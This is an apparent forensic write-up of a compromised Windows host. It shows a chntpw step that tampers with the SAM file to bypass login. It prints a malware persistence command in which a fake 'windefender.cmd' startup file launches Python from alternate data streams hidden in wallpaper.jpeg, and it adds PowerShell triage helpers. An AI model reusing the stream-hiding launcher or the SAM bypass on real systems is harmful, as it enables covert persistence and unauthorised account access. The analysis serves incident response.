REPORT:
Mount the disk on Kali Linux
Navigate to the registry hive directory: cd /media/kali/96DA97B8DA97935B/Windows/System32/config
Run the tool chntpw to tamper with the SAM file (stores password hashes):
sudo chntpw -i SAM
Boot Windows and start with a first overview:
strange CPU cycles (might be unrelated after all)
non-default desktop background on an unactivated OS
3 command prompts (and sometimes 2 PowerShells) at startup
2 programs with the same name in startup (windefender.cmd)
Investigation of the startup programs:
x2 windefender.cmd
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\windefender.cmd :
Content :
wmic process call create "C:\Users\myles\Pictures\wallpaper.jpeg:py.exe C:\Users\myles\Pictures\wallpaper.jpeg:stage2.py"
Permissions :
Account Unknown(S-1-5-21-2380584983-3046493731-2506961790-1000) Special
myles (DESKTOP-8DK0CQ3\myles) Special
SYSTEM Full control
Administrators (DESKTOP-8DK0CQ3\Administrators) Full control
Users (DESKTOP-8DK0CQ3\Users) Read & Execute
Everyone Read & Execute
C:\Users\myles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windefender.cmd :
Content :
wmic process call create "C:\Users\myles\Pictures\wallpaper.jpeg:py.exe C:\Users\myles\Pictures\wallpaper.jpeg:stage2.py"
Permissions :
myles (DESKTOP-8DK0CQ3\myles) Full control
SYSTEM Full control
Administrators (DESKTOP-8DK0CQ3\Administrators) Full control
Investigation about file : "C:\Users\myles\Pictures\wallpaper.jpeg"
dir /r C:\Users\myles\Pictures
Output (dir /r also lists alternate data streams, shown as file:stream:$DATA):
        539,150 wallpaper.jpeg
     16,269,935 wallpaper.jpeg:py.exe:$DATA
            121 wallpaper.jpeg:run.ps1:$DATA
          1,644 wallpaper.jpeg:stage2.py:$DATA
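The startup-folder review and the ADS listing above, written as reusable PowerShell triage functions. This is an added example, not part of the original report; it assumes a Windows host with PowerShell 5.1 or later, takes the user name "myles" and the wallpaper.jpeg path from the report as defaults, and the function names (Get-StartupEntries, Get-AlternateStreams, Find-AdsLaunchedProcess) are its own.

```powershell
# Added triage helpers (not part of the original report). Assumes a Windows host
# with PowerShell 5.1 or later. The default user name and the wallpaper.jpeg path
# are the ones named in the report; the function names are this example's own.

function Get-StartupEntries {
    # Lists every file in the machine-wide and the given user's Startup folders,
    # with owner and a short preview of script content, so duplicate names such
    # as the two windefender.cmd files stand out together with what they launch.
    param([string]$UserName = 'myles')
    $folders = @(
        "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
        "C:\Users\$UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    )
    foreach ($folder in $folders) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        Get-ChildItem -LiteralPath $folder -File -Force | ForEach-Object {
            $preview = ''
            if ($_.Extension -in '.cmd', '.bat', '.ps1', '.vbs', '.js') {
                $raw = Get-Content -LiteralPath $_.FullName -Raw -ErrorAction SilentlyContinue
                if ($raw) {
                    $flat = $raw -replace '\s+', ' '
                    $preview = $flat.Substring(0, [Math]::Min(200, $flat.Length))
                }
            }
            [pscustomobject]@{
                Folder  = $folder
                Name    = $_.Name
                Size    = $_.Length
                Written = $_.LastWriteTime
                Owner   = (Get-Acl -LiteralPath $_.FullName).Owner
                Preview = $preview
            }
        }
    }
}

function Get-AlternateStreams {
    # Enumerates the named streams of one file (what dir /r shows for it) and
    # reads the content of the small ones, where launcher scripts such as
    # run.ps1 tend to sit; large streams like py.exe are only sized.
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$MaxPreviewBytes = 4096
    )
    # ':$DATA' is the file's own unnamed data stream; everything else is an ADS.
    Get-Item -LiteralPath $Path -Stream * -ErrorAction Stop |
        Where-Object { $_.Stream -ne ':$DATA' } |
        ForEach-Object {
            $content = ''
            if ($_.Length -le $MaxPreviewBytes) {
                $content = Get-Content -LiteralPath $Path -Stream $_.Stream -Raw -ErrorAction SilentlyContinue
            }
            [pscustomobject]@{
                File    = $Path
                Stream  = $_.Stream
                Length  = $_.Length
                Content = $content
            }
        }
}

function Find-AdsLaunchedProcess {
    # Heuristic: a command line containing a drive path with a second ':' after
    # the drive letter (wallpaper.jpeg:py.exe) refers to an executable stored in
    # an alternate data stream. Processes created through
    # "wmic process call create" have WmiPrvSE.exe as parent, so the parent
    # name is reported alongside.
    $all  = Get-CimInstance -ClassName Win32_Process
    $byId = @{}
    foreach ($p in $all) { $byId[[int]$p.ProcessId] = $p }
    $all | Where-Object { $_.CommandLine -match '[A-Za-z]:\\[^:"]*:[^\\/:"\s]+' } |
        ForEach-Object {
            $parent = $byId[[int]$_.ParentProcessId]
            $parentName = '<exited>'
            if ($parent) { $parentName = $parent.Name }
            [pscustomobject]@{
                ProcessId   = $_.ProcessId
                Name        = $_.Name
                ParentName  = $parentName
                CommandLine = $_.CommandLine
            }
        }
}

# Usage on the affected host (paths from the report):
Get-StartupEntries | Format-Table -AutoSize
Get-AlternateStreams -Path 'C:\Users\myles\Pictures\wallpaper.jpeg' | Format-Table -AutoSize
Find-AdsLaunchedProcess | Format-List
```

Run this from an elevated prompt so the machine-wide Startup folder and other users' processes are readable. The process check is a heuristic on the command line because the image path of a process started from a stream can show only the host file; confirm hits by listing the host file's streams with Get-AlternateStreams.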
Extraction of wallpaper.jpeg:run.ps1
Content :
wmic process call create "C:\Users\myles\Pictures\wallpaper.jpeg:py.exe C:\Users\myles\Pictures\wallpaper.jpeg:stage2.py"
Extraction and decoding of wallpaper.jpeg:stage2.py
Content :
Obfuscated Python code... (stage2.py)
Decoded (stage2_decoded.py)
Extraction and decoding of "C:\WinCache\stage1.ps1":
Content :
Obfuscated Python code... (stage1.py)
Decoded (stage1_decoded.py)